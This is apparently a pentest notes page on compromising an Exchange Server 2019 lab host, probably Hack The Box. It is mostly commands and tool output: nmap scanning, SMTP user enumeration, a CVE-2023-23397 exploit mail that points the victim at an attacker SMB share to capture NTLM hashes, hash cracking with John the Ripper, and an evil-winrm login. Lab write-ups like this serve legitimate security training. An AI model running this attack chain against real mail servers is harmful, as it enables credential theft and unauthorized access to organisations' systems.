OWA Exchange Server 2019

Exchange Server 2019

Nmap

nmap -p- -A <IP> -oA myHost                                     
Starting Nmap 7.93 ( https://nmap.org ) at XXX EDT
PORT      STATE SERVICE              VERSION
25/tcp    open  smtp                 Microsoft Exchange smtpd
| smtp-commands: ad.domain Hello [10.10.16.158], SIZE, PI

53/tcp    open  domain               Simple DNS Plus
80/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
81/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: 403 - Forbidden: Access is denied.
88/tcp    open  kerberos-sec         Microsoft Windows Kerberos (server time: XXXX-XX)
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
389/tcp   open  ldap                 Microsoft Windows Active Directory LDAP (Domain:DOMAIN
| 
443/tcp   open  ssl/https
| 
444/tcp   open  snpp?
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
465/tcp   open  smtp                 Microsoft Exchange smtpd
|     
587/tcp   open  smtp                 Microsoft Exchange smtpd

| 
|_  Product_Version: 10.0.17763
593/tcp   open  ncacn_http           Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
|
| 
717/tcp   open  smtp                 Microsoft Exchange smtpd
|
808/tcp   open  ccproxy-http?
890/tcp   open  mc-nmf               .NET Message Framing
1801/tcp  open  msmq?
2103/tcp  open  msrpc                Microsoft Windows RPC
2105/tcp  open  msrpc                Microsoft Windows RPC
2107/tcp  open  msrpc                Microsoft Windows RPC
3268/tcp  open  ldap                 Microsoft Windows Active Directory LDAP (Domain: DOMAIN., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
3389/tcp  open  ms-wbt-server        Microsoft Terminal Services
| ssl-cert: Subject: commonName=DOMAIN
| Not valid before: X
|_Not valid after:  X
| rdp-ntlm-info: 
|   Target_Name: DOMAIN
|   NetBIOS_Domain_Name: DOMAIN
|   NetBIOS_Computer_Name: DOMAIN
|   DNS_Domain_Name: DOMAIN
|   DNS_Computer_Name: DOMAIN
|   DNS_Tree_Name: DOMAIN
|   Product_Version: 10.0.17763
|_  System_Time: XXX
3875/tcp  open  msexchange-logcopier Microsoft Exchange 2010 log copier
5985/tcp  open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6001/tcp  open  ncacn_http           Microsoft Windows RPC over HTTP 1.0
6067/tcp  open  msrpc                Microsoft Windows RPC
...
64327/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
64337/tcp open  mc-nmf               .NET Message Framing

OWA - HTTPS 443

https://github.com/kh4sh3i/exchange-penetration-testing.git

git clone https://github.com/kh4sh3i/exchange-penetration-testing.git


cd exchange-penetration-testing 
                                                                                                                               
                                                                             
python3 get_exchange_version.py https://10.129.229.14                                         

Build number:15.2.1118
Exchange Server 2019

SMTP

https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt?raw=true

wget https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt?raw=true

smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./xato-net-10-million-usernames.txt


smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./users.txt

└─# smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./users.txt
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... ./users.txt
Target count ............. 1
Username count ........... 8295455
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ <DOMAIN>

######## Scan started at Thu XXX #########
10.129.229.14: valdaccount@DOMAIN exists

CVE-2023-23397

LogoGitHub - BronzeBee/cve-2023-23397: Python script for sending e-mails with CVE-2023-23397 payload using SMTPGitHub
CVE-2023-23397
git clone https://github.com/BronzeBee/cve-2023-23397.git

┌──(kali㉿kali)-[/HTB/OWA/cve-2023-23397]
└─$ python cve-2023-23397.py -s 10.129.229.110 -f fromemail@email -t toemail@email -p '\\10.10.16.158\test'
[*] CVE-2023-23397 exploit
[*] Author: @bronzebee

[*] Connecting to 10.129.229.110:25
[*] Sending message to discovered@validaccount.domain
[*] Message sent to all addresses successfully
[*] Total messages sent: 1/1

The exploit requires first SMB server running (impacket)

impacket-smbserver -smb2support share .

John the Ripper - crack NTLM hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

WinRM - TCP 5985

evil-winrm -i 10.129.229.14 -u validaccount -p 'password'

PreviousBloodhoundNextActive Directory Web Services (ADWS)

Last updated